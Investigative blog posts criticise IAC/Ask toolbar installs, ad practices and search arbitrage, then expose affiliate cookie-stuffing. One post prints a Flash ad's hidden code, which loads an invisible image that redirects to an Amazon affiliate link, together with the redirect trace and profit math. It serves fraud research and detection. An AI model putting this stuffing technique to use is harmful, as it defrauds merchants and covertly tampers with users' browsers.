IAC Toolbars and Traffic Arbitrage in 2013

Beginning in 2005, I flagged serious problems with IAC/Ask.com toolbars — including installations through security exploits and through bundles that nowhere sought user consent, installations targeting kids, rearranging users’ browsers to invite unintended searches, and showing a veritable onslaught of ads. IAC’s practices have changed in various respects, but the core remains as I previously described it: IAC’s search advertising business exists not to solve a genuine user need or provide users with genuine assistance, but to prey on users who — through inattention, inexperience, youth, or naivete — stumble into IAC’s properties.

Crucially, IAC remains substantially dependent on Google for monetization of IAC’s search services. A rigorous application of Google’s existing rules would put a stop to many of IAC’s practices, and sensible updated rules — following the stated objective of Google’s existing policies — would end much of the rest.

In this piece I examine current IAC toolbar installation practices (including targeting kids and soliciting installations when users are attempting to install security updates), the effects of IAC toolbars once installed (including excessive advertising and incomplete uninstall), and IAC’s search arbitrage business. I conclude by flagging advertisements with impermissibly large clickable areas (for both toolbars and search arbitrage), and I call on Google to put an end to Ask’s practices.

IAC Toolbar Installation

IAC’s search toolbar business is grounded in placing IAC toolbars on as many computers as possible. To that end, IAC offers 50+ different toolbars with a variety of branding — Webfetti (“free Facebook graphics”), Guffins (“virtual pet games”), religious toolbars of multiple forms (Know the Bible, Daily Bible Guide, Daily Jewish Guide), screensavers, games, and more. One might reasonably ask: Why would a user want such a toolbar?

IAC ad promises “free online television” but actually merely links to material already on the web; promises an “app” but actually provides a search toolbar.

IAC ad solicits installations via “virtual pet” ad distinctively catering to kids.

Other IAC Guffins ads specifically invite “kids” to install. (Screenshot by iSpionage)

IAC Guffins offer features multiple animated cartoon images, distinctively catering to kids.

The Television Fanatic toolbar is instructive. IAC promotes this toolbar with search ads that promise “free online television” and “turn your computer into a TV watch full TV episode w free app.” It sounds like an attractive deal: many users would relish the ability to watch free live broadcast television on an ordinary computer, and it would not be surprising if such a service required downloading some sort of desktop application or browser plug-in. But in fact Television Fanatic offers nothing of the sort. To the extent that Television Fanatic offers the “free online television” promised in the ad, it only links to ordinary video content already provided by others. (For example, I clicked the toolbar’s “ABC” link and was taken to http://abc.go.com/watch/, an ordinary ABC link equally available to users without Television Fanatic.) That’s a far cry from IAC’s promise of special access to premium material.

Meanwhile, IAC’s Guffins toolbar distinctively targets kids. IAC promotes Guffins via search ads for terms like “virtual pet”, and the resulting ad says Guffins offers “puppy, cats, bunny, dragons & more” which a user can “feed, play, [and] care for.” The landing page features four animated animals with oversized faces and overstated features, distinctively attractive to children. Under COPPA factors or any intuitive analysis, IAC clearly targets kids. Indeed, ad tracking service iSpionage reports Guffins ads touting “Free Kids Games Download”, “Free Kids Computer Games”, “Play Kids Games Online”, and more — explicitly inviting children to install Guffins. Of course kids are ill-equipped to evaluate IAC’s offer — less likely to notice IAC’s disclosures of an included toolbar, less likely to understand what a search toolbar even is, and less able to evaluate the wisdom of installing such a toolbar in exchange for games.

While IAC’s ads often promise an “app” (including as shown in the ad screenshots at right), IAC actually offers just toolbars: add-ins appearing within web browsers, not the freestanding applications that the ads suggest. That’s all the more deceptive: IAC enticed users with the promise of genuine distinct programs offering exceptional video content and rich gaming. Instead IAC provided browser plug-ins that claim valuable screen space whenever users browse the web. And far from providing exclusive content, IAC toolbars send users to material already on the web and drive traffic to IAC’s advertising displays (as detailed in the next section). That’s strikingly inferior.

IAC’s toolbar installation practices stack up unfavorably vis-a-vis applicable Google policies, industry standards, and regulatory requirements. Google’s Software Principles call for “Upfront disclosure” with no suggestion that an app may promise one thing in an initial solicitation, then something else in a subsequent landing page. (IAC is obliged to comply with Google’s rules because IAC toolbars show ads from Google, as discussed in the next section.) Meanwhile, the Anti-Spyware Coalition specifically flags installations targeting children, allowing bundling by affiliates, and modifying browser settings as risk factors making software a greater concern. Even decades-old FTC rules are on point, disallowing “deceptive door openers” that promise one thing at the outset (like IAC’s initial promise of “free online television”) but later deliver something importantly different (a search toolbar).

Web searches reveal numerous user complaints about IAC toolbars. Consider search results for “televisionfanatic”. The first result links to the product’s official site. Second is a Sitejabber forum with 20 harsh reviews. (17 reviewers gave Television Fanatic just one star out of five, with comments systematically reporting surprise and annoyance at the toolbar’s presence.) The third result advises “How to uninstall a Television fanatic toolbar”, and the fourth is multiple Yahoo Answers discussions including a user asking “Is television fanatic toolbar a virus?” and others repeatedly complaining about unintended installation. Clearly numerous users are dissatisfied with Television Fanatic.

So too for DailyBibleGuide. In a Q1 2011 earnings call, IAC CEO Greg Blatt touted the DailyBibleGuide toolbar as a new product IAC is particularly proud of. But Google search results for “DailyBibleGuide” include a page advising “do not download Dailybiblestudy, Dailybibleguide, or Knowthebible extension.” There and elsewhere, users seem surprised to receive IAC’s toolbars. Reading users’ complaints, it seems their confusion ultimately results from IAC’s decision to deliver bible trivia via a toolbar. After all, such material would more naturally be delivered via a web page, email newsletter, or perhaps RSS feed. IAC chose the odd strategy of toolbar-based delivery not because it was genuinely what users wanted, but because this is the format IAC can best monetize. No wonder users systematically end up disappointed.

By all indications, a huge number of users are running IAC toolbars. The IAC toolbars discussed in this section all send users to mywebsearch.com, a site users are unlikely to visit except if sent there by an IAC toolbar. Alexa reports that mywebsearch.com is the #41 most popular site in the US and #71 worldwide — more popular than Instagram, Flickr, Pandora, and Hulu.

Some of IAC’s browser configuration changes remain in place even if a user removes an IAC toolbar. I installed then uninstalled an IAC Television Fanatic toolbar and received a prompt instructing “Click here for help on resetting your home page and default search settings.” The resulting page specified four different procedures totaling 16 steps, far lengthier than the initial installation. I can see no proper reason why uninstall is so difficult. Indeed, IAC’s incomplete uninstall specifically violates Google’s October 2012 requirement that “During the uninstall process, users must be presented with a choice that gives them the option of returning their browser’s user settings to the previous settings.” Google’s Software Principles are also on point, instructing that uninstall must be “easy” and must disable “all functions of the application.” Yet IAC’s automated uninstaller does not undo all of IAC’s changes, and IAC’s manual 16-step process is the opposite of “easy.”

The Special Problems of IAC Ask Toolbar Installed by Oracle’s Java Updates

Oracle Java security updates install Ask Toolbar by default, with just a single click in a multi-step installer.

Ongoing Oracle Java updates also install the IAC Ask Toolbar. I discuss these installations in this separate section because they raise concerns somewhat different from the IAC toolbars discussed above. I see five key problems with Oracle Java updates that install IAC toolbars:

First, as Ed Bott noted last week, the “Install the Ask Toolbar” checkbox is prechecked, so users can install the Ask toolbar with a single click on the “Next” button. Accidental installations are particularly likely because the Ask installation prompt is step three of a five-screen installation process. When installing myriad software updates, it’s easy to get into a routine of repeatedly clicking Next to finish the process as quickly as possible. But in this case, just clicking Next yields the installation of Ask’s toolbar.

Second, although the Ask installation prompt does not show a “focus” (a highlighted button designated as the default if a user presses enter), the Next button actually has focus. In testing, I found that pressing the enter or spacebar keys has the same effect as clicking “Next.” Thus, a single press of either of the two largest keys on the keyboard, with nothing more, is interpreted as consent to install Ask. That’s much too low a bar — far from the affirmative indication of consent that Google rules and FTC caselaw call for.

Third, in a piece posted today, Ed Bott finds Oracle and IAC intentionally delaying the installation of the Ask Toolbar by fully ten minutes. This delay undermines accountability, especially for sophisticated users. Consider a user who mistakenly clicks Next (or presses enter or spacebar) to install Ask Toolbar, but immediately realizes the mistake and seeks to clean his computer. The natural strategy is to visit Control Panel – Programs and Features to activate the Ask uninstaller. But a user who immediately checks that location will find no listing for the Ask Toolbar: The uninstaller does not appear until the Ask install finishes after the intentional ten minute delay. Of course even sophisticated users have no reason or ability to know about this delay. Instead, a sophisticated user would conclude that he somehow did not install Ask Toolbar after all — and only later will the user notice and, perhaps, proceed with uninstall. Half a decade ago I found WhenU adware engaged in similar intentional delay. Similarly, NYAG litigation documents revealed notorious spyware vendor Direct Revenue intentionally declining to show ads in the first day after its installation. (Direct Revenue staff said this delay would “reduce the correlation between the Morpheus download [which bundled Direct Revenue spyware] and why they are seeing [Direct Revenue’s popup] ads” — confusion that DR staff hoped would “creat[e] less of a path to what they [users] should uninstall.”) Against this backdrop, it’s particularly surprising to see IAC and Oracle adopt this tactic.

Fourth, IAC makes changes beyond the scope of user consent and fails to revert these changes during uninstall. The Oracle/IAC installation solicitation seeks permission to install an add-on for IE, Chrome, and Firefox, but nowhere mentions changing address bar search or the default Chrome search provider. Yet the installer in fact makes all these changes, without ever seeking or receiving user consent. Conversely, uninstall inexplicably fails to restore these settings. As noted above, these incomplete uninstalls violate Google’s Software Principles requirement that an “easy” uninstall must disable “all functions of the application.”

Finally, the Java update is only needed as a result of a serious security flaw in Java. It is troubling to see Oracle profit from this security flaw by using a security update as an opportunity to push users to install extra advertising software. Java’s many security problems make bundled installs all the worse: I’ve received new Ask installation prompts with each of Java’s many security updates. (Ed Bott counts 11 over the last 18 months.) Even if the user had declined IAC’s offer on half a dozen prior requests, Oracle persists in asking, and a single slip-up, just one click or keystroke on the tenth request, will nonetheless deliver Ask’s toolbar.

A security update should never serve as an opportunity to push additional software. As Oracle knows all too well from its recent security problems, users urgently need software updates to fix serious vulnerabilities. By bundling advertising software with security updates, Oracle teaches users to distrust security updates, deterring users from installing updates from both Oracle and others. Meanwhile, by making the update process slower and more intrusive, Oracle reduces the likelihood that users will successfully patch their computers. Instead, Oracle should make the update process as quick and easy as possible — eliminating unnecessary steps and showing users that security updates are quick and trouble-free.

Toolbar Operations and Result Format

Once a user receives an IAC toolbar, a top-of-browser stripe appears in Internet Explorer and Firefox, and IAC also takes over default search, address bar search, and error handling. That’s an intrusive set of changes, and particularly undesirable in light of the poor quality of IAC’s search results.

If a user runs a search through an IAC toolbar or through a browser search function modified by IAC, the user receives a Mywebsearch or Ask.com results page with advertisements and search results syndicated from Google. The volume of advertisements is remarkable: On an 800×600 monitor, the entire first two screens of Mywebsearch results presented advertisements (screen one, screen two), namely four large ads with a total of seven additional miniature ads contained within. The first algorithmic search result appears on the third on-screen page, where users are far less likely to see it. At Ask.com, ads are even larger: fully seven advertisements appear above the first algorithmic result, and three more ads appear at page bottom, more than filling two 800×600 screens.

IAC obtains these advertisements and search results from Google, but IAC omits features Google proudly touts in other contexts. For example, Google claims that its maps, hotel reviews, and hotel price quotes benefit users and save users time — but inexplicably IAC Mywebsearch lacks these features, even though these features appear prominently and automatically for users who run the same search at Google. In short, a user viewing IAC results gets listings that are intentionally less useful — designed to serve IAC’s business interest in encouraging the user to click extra advertisements, with much less focus on providing the information that IAC and Google consider most useful.

The ad format at IAC Mywebsearch and Ask.com makes it particularly likely that users will mistake IAC ads for algorithmic results. For one, IAC omits any distinctive background color to help users distinguish ads from algorithmic results. Furthermore, IAC’s voluminous ads extend beyond the first screen of results for many searches. A user familiar with Google would expect ads to have a distinctive background color and would know that ads rarely fill a screen completely. Seeing no such background color and similar-format results continuing for two full screens, the user might well conclude that these are algorithmic listings rather than paid advertisements.

Traffic Arbitrage

IAC buys traffic from Google and other search engines. The resulting sequence is needlessly convoluted: A user runs a search at Google, clicks an IAC ad purporting to offer what the user requested, then receives an IAC landing page with the very same ads just seen at Google. For example, I searched for [800 number look up] at Google and clicked an Ask ad. The resulting Ask page allocated most of its above-the-fold space to three of the same ads I had just seen at Google! This process provides zero value to the user (indeed, negative value, in that the extra click adds time and confusion). But IAC monetizes its site unusually aggressively, for example regularly putting four ads at the top of the page, where Google sometimes puts none and never presents more than three. Of course these extra ads serve IAC’s interest: By pushing a fraction of users to click multiple ads, IAC can more than cover its costs of buying the traffic from Google in the first place.

Longstanding Google rules squarely prohibit IAC’s search arbitrage. Google’s AdWords Policy Center instructs that “Google AdWords doesn’t allow the promotion of websites that are designed for the sole or primary purpose of showing ads.” Google continues: “One example of this kind of prohibited behavior is called arbitrage, where advertisers drive traffic to their websites at low cost and pay for that traffic by earning money from the ads placed on those websites.”

Why isn’t Google enforcing its rules against arbitrage? An October 2012 Search Engine Land article quotes a reader who wrote to Google AdWords support, where a representative replied with unusual candor: “Since Ask.com is considered a Google product, they are able to serve ads at the top of the page when the search query is found to be relevant to their ads.” Of course Ask.com is not actually “a Google product” — it’s a Google syndicator, showing Google ads in exchange for a revenue share, just like thousands of other sites. But with IAC reportedly Google’s biggest advertising customer, special privileges would be less than surprising. Meanwhile, Google lets IAC do Google’s dirty work — showing extra ads to gullible users — which could let Google collect additional ad revenue from those users’ clicks. Still, that’s no help to users (who get pulled into extra page-views and less useful pages with more advertisements) or advertisers (whose costs increase as a result). And once the public recognizes Google’s role in authorizing this scheme, selling all advertising, and funding the entirety of IAC’s activity, Google ends up looking at least as culpable as IAC.

Ads with Oversized Clickable Areas

Contrary to standard industry practice and Google rules, IAC makes the entire ad (including domain name, ad text, and large whitespace) into a clickable link. Notice the large clickable area flagged in the red box.

At Google, only the ad title is clickable. Note the much smaller red box.

IAC’s ads also flout industry practice and Google rules as to the size of an ad’s clickable area. Both in arbitrage landing pages and in toolbar results, IAC’s search result pages expand the clickable area of each advertisement to fill the entire page width, sharply increasing the fraction of the page where a click will be interpreted as a request to visit the advertiser’s page.

See the screenshot at right. (To create the red-outlined box showing the shape of the clickable area, I clicked an empty section of the ad and began a brief drag, causing my browser to highlight the ad’s clickable area in red as shown in the screenshot.)

Ask is an outlier in converting whitespace around an ad into a clickable area. Every other link on Ask.com landing pages (every link other than an advertisement) follows standard industry practice with only the words of the link being clickable, but not the surrounding whitespace. Indeed, at Google, Bing, and Yahoo, white space is never clickable. At Google and Bing, only ad titles are clickable, not ad domain names or ad text. (See Google screenshot at right, showing the limited clickable area of a Google ad.) At Yahoo, only ad titles and domain names are clickable, not ad text or white space.

IAC has taken intentional action to expand its ads’ clickable area to cover all available width. As W3schools explains, “A block element is an element that takes up the full width available.” To expand ad hyperlinks to fill the entire width, Ask tags each ad hyperlink with the CSS STYLE of display:block.

<a id="lindp" class="ptbs pl20 pr30 ptsp pxl" style="display:block;padding-bottom: 0px;" …
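As a rough illustration of how one might check a results page for this pattern, the following Python sketch scans HTML for hyperlinks whose inline style sets display:block. It is a minimal sketch under stated assumptions, not the method used to prepare this article: the class name BlockLinkFinder, the helper find_block_links, and the sample markup (including its placeholder href values and link text) are hypothetical, and only the id, class, and style attributes of the first link come from the Ask snippet above.

```python
from html.parser import HTMLParser


class BlockLinkFinder(HTMLParser):
    """Collects the ids of <a> tags whose inline style sets display:block."""

    def __init__(self):
        super().__init__()
        self.block_links = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        attr = dict(attrs)
        style = (attr.get("style") or "").lower()
        # Split the inline style into property/value declarations.
        declarations = {}
        for decl in style.split(";"):
            if ":" in decl:
                prop, value = decl.split(":", 1)
                declarations[prop.strip()] = value.strip()
        if declarations.get("display") == "block":
            self.block_links.append(attr.get("id"))


def find_block_links(html):
    """Return the ids of hyperlinks that expand to the full available width."""
    finder = BlockLinkFinder()
    finder.feed(html)
    return finder.block_links


# Hypothetical sample: the first link reuses the attributes quoted above;
# the href values and link text are placeholders added for illustration.
SAMPLE = (
    '<a id="lindp" class="ptbs pl20 pr30 ptsp pxl" '
    'style="display:block;padding-bottom: 0px;" href="#">Ad title</a>'
    '<a id="plain" href="#">Ordinary link</a>'
)

print(find_block_links(SAMPLE))
```

This check only sees inline style attributes. A page that applies display:block through a stylesheet rule would need a rendering-based test, such as the click-and-drag approach described above.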

Google’s rules prohibit IAC’s expanded clickable areas. Google requires that “clicking on space surrounding an ad should not click the ad.” Yet IAC nonetheless makes a clickable area out of the area surrounding each ad, extending all the way to the right column.

IAC’s expanded ads invite accidental clicks. Accidental clicks are particularly likely from the inexperienced users IAC systematically targets for toolbar installations, and also from users searching on tablets, phones, and other touch devices. These extra clicks waste users’ time and drive up advertisers’ costs — but every such click yields extra revenue for IAC and Google.

What Comes Next

Google should enforce its rules strictly. No doubt IAC can offer Google some short-term revenue via extra ad-clicks from unsophisticated or confused users. But this isn’t the kind of business Google aspires to, and Google’s public statements indicate no interest in such bottom-feeding. Indeed, a fair application of Google’s existing AdWords rules would disallow both IAC’s toolbar ads (using AdWords to solicit installations) and IAC’s search arbitrage ads (using AdWords to send users to IAC pages presenting syndicated AdWords ads). Meanwhile, numerous Google AdSense rules are also on point, including prohibiting encouraging accidental clicks, prohibiting site layout that pushes content below the fold, and limiting the number of ads per page. So too for Software Principles requiring up-front disclosure as well as “easy” and complete uninstall.

As a publicly-traded company, IAC should benefit from the oversight and guidance of its outside directors. But the New York Times commented in 2011 that “IAC’s board is filled with high-powered friends of Mr. Diller,” calling into question the independence and effectiveness of IAC’s outside directors. Of particular note is Chelsea Clinton, who joined IAC’s board in September 2011. Ms. Clinton’s prior experience includes little obvious connection to Internet advertising or online business, suggesting that she might need to invest extra time to learn the details of IAC’s business. Yet she also has weighty commitments including ongoing doctoral studies, serving as an Assistant Vice Provost at NYU, and reporting as a special correspondent for the NBC Nightly News — calling into question the time she can devote to IAC matters. The Times questioned why IAC had brought in Ms. Clinton, concluding that “This is clearly an appointment made because of who she is, not what she has done.” Indeed, Ms. Clinton’s background means she will be held to a particularly high standard: if she fails to stop IAC’s bad practices, the public may reasonably ask whether she has done her duty as an outside director.

Recent research from Goldman analyst Heath Terry flags investor concerns about IAC’s tactics. In a December 4, 2012 report, Terry downgraded IAC to sell due to vulnerability from Google policy changes. A January 9, 2013 follow-up noted IAC changing its uninstall practices to comply with Google policy as well as a slowdown in arbitrage. Terry flags some important factors, and I share his bottom line that IAC’s search practices are unsustainable. But the real shoe has yet to drop. If Google is embarrassed at IAC’s actions (and it should be), Google is easily able to put an end to this mess.

I prepared a portion of this article at the request of a client that prefers not to be listed by name. The client kindly agreed to let me include that research in this publicly-available posting.

Affiliate Fraud Litigation Index

Some analysts view affiliate marketing as “fraud-proof” because affiliates are only paid a commission when a sale occurs. But affiliate marketing nonetheless gives rise to various disputes — typically, merchants alleging that affiliates claimed commission they had not properly earned. Most such disputes are resolved informally: merchants withhold amounts affiliates have purportedly earned but have not yet received. Occasionally, disputes end up in litigation with public availability of the details of alleged perpetrators, victims, amounts, and methods.

In today’s posting, I present known litigation in this area including case summaries and primary source documents:

Affiliate Fraud Litigation Index

Flash-Based Cookie-Stuffer Using Google AdSense to Claim Unearned Affiliate Commissions from Amazon with Wesley Brandi

Merchants face special challenges when operating large affiliate marketing programs: rogue affiliates can claim to refer users who would have purchased from those merchants anyway. In particular, rogue “cookie-stuffer” affiliates deposit cookies invisibly and unrequested — knowing that a portion of users will make purchases from large merchants in the subsequent days and weeks. This tactic is particularly effective in defrauding large merchants: the more popular a merchant becomes, the more users will happen to buy from that merchant within a given referral period.

To cookie-stuff at scale, an attacker needs a reliable and significant source of user traffic. In February we showed a rogue affiliate hacking forum sites to drop cookies when users merely browse forums. But that’s just one of many strategies. I previously found various cookie-stuffing on sites hoping to receive search traffic. In a 2009 complaint, eBay alleges that rogue affiliates used a banner ad network to deposit eBay affiliate cookies when users merely browsed web pages showing certain banner ads. See also my 2008 report of an affiliate using Yahoo’s Right Media ad network to deposit multiple affiliate cookies invisibly — defrauding security vendors McAfee and Symantec.

As the eBay litigation indicates, display advertising networks can be a mechanism for cookie-stuffing. Of course diligent ad networks inspect ads and refuse cookie-stuffers (among other forms of malvertising). So we were particularly surprised to see Google AdSense running ads that cookie-stuff Amazon.

This innocuous-looking “review different headphones” banner ad sets Amazon Associates affiliate cookies invisibly.

The Imgwithsmiles attack

We have uncovered scores of web sites running the banner ad shown at right. On 40 sites, on various days from February 6 to May 2, our crawlers found this banner ad dropping Amazon Associates affiliate cookies automatically and invisibly. All 40 sites include display advertising from Google AdSense. Google returns a Flash ad from Imgwithsmiles. To an ordinary user, the ad looks completely innocuous — the unremarkable “review different headphones” image shown at right. However, the ad actually creates an invisible IMG (image) tag loading an Amazon Associates link and setting cookies accordingly. Here’s how:

First, the ad’s Flash code creates an invisible IMG tag (10×10 pixels) (yellow highlighting below) loading the URL http://imgwithsmiles.com/img/f/e.jpg (green).

function Stuff() {
  if (z < links.length) {
    txt.htmltext = links[z];
    z++;
    return(undefined);
  }
  clearinterval(timer);
}
links = new array();
links[0] = "<img src=\"http://imgwithsmiles.com/img/f/e.jpg\" width=\"10\" height=\"10\"/>";
z = 0;
timer = setinterval(Stuff, 2000);

While /img/f/e.jpg features a .jpg extension consistent with a genuine image file, it is actually a redirect to an Amazon Associates link. See the three redirects preserved below (blue), including a tricky HTTPS redirect (orange) that would block many detection systems. Nonetheless, traffic ultimately ends up at Amazon with an Associates tag (red) specifying that affiliate charslibr-20 is to be paid for these referrals.

GET /img/f/e.jpg HTTP/1.0
Accept: */*
Accept-Language: en-US
Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CICAgICQvuXgahDQAhiYAjII3bQHU19r_Is
x-flash-version: 10,3,183,7
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; ...)
Host: imgwithsmiles.com
Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily
Date: Wed, 02 May 2012 19:56:59 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=174272468a212dd0862eabf8d956e4e0; path=/
Location: https://imgwithsmiles.com/img/kick/f/e.jpg
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

HTTPS redirect decoded via separate manual request

GET /img/kick/f/e.jpg HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: ...
Accept-Encoding: gzip, deflate
Host: imgwithsmiles.com
Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily
Date: ...
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Location: http://imgwithsmiles.com/img/t/f/e.jpg
Content-Length: 0
Connection: close
Content-Type: text/html

GET /img/t/f/e.jpg HTTP/1.0
Accept: */*
Accept-Language: en-US
x-flash-version: 10,3,183,7
User-Agent: Mozilla/4.0 (compatible; ...)
Connection: Keep-Alive
Host: imgwithsmiles.com
Cookie: PHPSESSID=174272468a212dd0862eabf8d956e4e0

HTTP/1.1 302 Moved Temporarily
Date: Wed, 02 May 2012 19:56:59 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.amazon.com/gp/product/B002L3RREQ?ie=UTF8&tag=charslibr-20
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html

If a user happens to make a purchase from Amazon within the subsequent 24 hours, Amazon will pay a commission to this affiliate — even though the affiliate did nothing at all to cause or encourage the user to make that purchase.
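To make the detection logic concrete, here is a minimal Python sketch that takes the Location headers from the trace above and flags a request that begins as an apparent image but ends at Amazon with an Associates tag. The function names (associates_tag, looks_like_image, find_stuffed_tag) are hypothetical and chosen for illustration; this is not a description of our crawler, which also has to fetch the HTTPS hop itself.

```python
from typing import List, Optional
from urllib.parse import parse_qs, urlparse

# Location headers copied from the trace above, in order of appearance.
REDIRECT_CHAIN = [
    "https://imgwithsmiles.com/img/kick/f/e.jpg",
    "http://imgwithsmiles.com/img/t/f/e.jpg",
    "http://www.amazon.com/gp/product/B002L3RREQ?ie=UTF8&tag=charslibr-20",
]


def associates_tag(url: str) -> Optional[str]:
    """Return the Associates tag if the URL points at Amazon, else None."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    if host != "amazon.com" and not host.endswith(".amazon.com"):
        return None
    values = parse_qs(parsed.query).get("tag")
    return values[0] if values else None


def looks_like_image(url: str) -> bool:
    """True if the URL path ends in a common image file extension."""
    path = urlparse(url).path.lower()
    return path.endswith((".jpg", ".jpeg", ".png", ".gif"))


def find_stuffed_tag(start_url: str, chain: List[str]) -> Optional[str]:
    """Flag an 'image' request whose redirects land on a tagged Amazon URL."""
    if not looks_like_image(start_url):
        return None
    for url in chain:
        tag = associates_tag(url)
        if tag:
            return tag
    return None


print(find_stuffed_tag("http://imgwithsmiles.com/img/f/e.jpg", REDIRECT_CHAIN))
```

A genuine image request has no reason to redirect to a merchant's product page, so the combination of an image-like starting URL and an affiliate tag at the end of the chain is a useful signal even without inspecting the Flash code.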

Does Amazon know?

The available information does not reveal whether or not Amazon knew about this affiliate’s practices. Nor can we easily determine whether, as of the May 2, 2012 observations presented above, this affiliate was still in good standing and receiving payment for the traffic it sent to Amazon.

On one hand, Amazon is diligent and technically sophisticated. Because Amazon runs one of the web’s largest affiliate programs, Amazon is necessarily familiar with affiliate fraud. And Amazon has ample incentive to catch affiliate fraud: Every dollar paid to fraudulent affiliates is money completely wasted, coming straight from the bottom line.

On the other hand, we have observed this same affiliate cheating Amazon for three months nonstop. All told, we’ve seen this affiliate rotating through 49 different Associates IDs. If Amazon had caught the affiliate, we would have expected the affiliate to shift away from any disabled affiliate accounts, most likely by shifting traffic to new accounts. Of the 28 Associates IDs we observed during February 2012, we still saw 6 in use during May 2012 (month-to-date) — suggesting that while Amazon may be catching some of the affiliate’s traffic, Amazon probably is not catching it all.

A further indication of the affiliate’s earnings comes from the affiliate’s willingness to incur out-of-pocket costs to buy media (AdSense placements from Google) with which to deliver Amazon cookies. As best we can tell, Amazon is the affiliate’s sole source of revenue. Meanwhile, the affiliate must pay Google for the display ad inventory the affiliate receives. These direct incremental costs give the affiliate a clear incentive to cease operation if it concludes that payment from Amazon will not be forthcoming. From the affiliate’s ongoing actions we can infer that the affiliate finds this scheme profitable — that its earnings to date have exceeded its expenses to date.

How profitable is this affiliate’s attack? Conservatively, suppose 40% of users are Amazon shoppers and make an average of four purchases from Amazon per year. Then 0.4*4/365=0.44% of users are likely to make purchases from Amazon in any given 24-hour period. Suppose the affiliate buys 1,000,000 CPM impressions from Google. Then the affiliate will enjoy commission on 0.44%*1,000,000=4,384 purchases. At an average purchase size of $30 and a 6.5% commission, this would be $8,547 of revenue per million cookie-stuffing incidents. How much would the affiliate have to pay Google for 1,000,000 CPM impressions? We’ve seen this affiliate on a variety of sites, but largely sites in moderate to low-priced verticals. At $2 CPM, the affiliate’s costs would be $2,000 — meaning the affiliate would still be slightly profitable even if Amazon caught 3/4 of its affiliate IDs before the first payment!
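The estimate above can be restated as a short Python sketch. The parameter names are illustrative labels for the figures assumed in the text (40% shopper share, four purchases per year, $30 average order, 6.5% commission, $2 CPM). `share_caught` is an added, hypothetical parameter for the fraction of commissions the merchant withholds.

```python
def stuffing_economics(impressions, shopper_share=0.40, purchases_per_year=4,
                       avg_order=30.0, commission_rate=0.065, cpm_cost=2.0,
                       share_caught=0.0):
    """Back-of-envelope model using the assumptions stated in the text."""
    # Chance that a given user buys from the merchant in any 24-hour window.
    daily_purchase_rate = shopper_share * purchases_per_year / 365
    purchases = daily_purchase_rate * impressions
    revenue = purchases * avg_order * commission_rate
    # Commission actually received if the merchant withholds a share of it.
    revenue_kept = revenue * (1 - share_caught)
    # CPM pricing: cost per thousand impressions.
    media_cost = impressions / 1000 * cpm_cost
    return {
        "daily_purchase_rate": daily_purchase_rate,
        "purchases": purchases,
        "revenue": revenue,
        "revenue_kept": revenue_kept,
        "media_cost": media_cost,
        "profit": revenue_kept - media_cost,
    }

baseline = stuffing_economics(1_000_000)
mostly_caught = stuffing_economics(1_000_000, share_caught=0.75)
print(round(baseline["purchases"]), round(baseline["revenue"], 2))
print(round(mostly_caught["profit"], 2))
```

With the default inputs the model gives roughly 4,384 purchases and about $8,548 of commission per million impressions, which matches the text's figures up to rounding. With three quarters of commissions withheld, the remaining revenue still slightly exceeds the $2,000 media cost.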

We alerted our contact at Amazon Associates to our observations. We will update this post with any information Amazon provides.

Search My Logs of Affiliate Fraud

Since 2004, I’ve been tracking and reporting all manner of rogue affiliates: using spyware and adware to cover competitors’ sites; using trickier spyware and adware to claim commission on merchants’ organic traffic; typosquatting; stuffing cookies through invisible IFRAMEs and IMGs, banner ads, and even hacked forum sites; and the list goes on. I now have automation catching these practices in ever-increasing quantities.

While I’ve written up dozens of rogue affiliates on this site and in various presentations, today Wesley Brandi and I are introducing something better: query-based access to our records of affiliate fraud targeting top affiliate merchants. Enter a merchant’s domain name, and we’ll tell you how much affiliate fraud we’ve seen targeting that domain. That is handy for merchants wanting to check whether their program is clean, and for affiliates wanting to confirm the trustworthiness of a program they’re considering promoting. We’re not currently posting details of the specific perpetrators, but we have affiliate ID numbers, domain names, and packet log proof on file for each violator, and we can provide these upon request.

Take a look:

Affiliate Fraud Information Lookup
(2015 update: service no longer operational)

Hack-Based Cookie-Stuffing by Bannertracker-Script with Wesley Brandi

Last month we presented an example cookie-stuffer using encoded JavaScript to drop scores of cookies invisibly. But how can such a cookie-stuffer get traffic to its site? Today’s example is particularly nefarious: Perpetrators using server bannertracker-script.com have hacked at least 29 different online discussion forums to add invisible code that lets them cookie-stuff forum visitors. Through this approach, perpetrators have gained access to a particularly large amount of traffic — letting them target all the more users.

Getting Traffic to Bannertracker-script

The perpetrators appear to be targeting a documented exploit in vBulletin (a popular forum discussion program built in PHP/MySQL) versions v4.x to v4.1.2. The exploit allows for a remote attacker to execute arbitrary PHP script as well as untrusted SQL queries. It was first reported in German in April 2011, then in English in January 2012. A video tutorial even offers step-by-step instructions on how to use this exploit.

Our automation systems have examined more than 500,000 sites, searching for code promoting the cookie-stuffers we are following. We have found numerous affected sites, including sites as popular as searchenginewatch.com (Alexa traffic rank #2045), webdeveloper.com (#2822) and redflagdeals.com (#3188) along with many more. Selected pages of these sites (typically the forum pages) embed hostile code from Bannertracker-script.

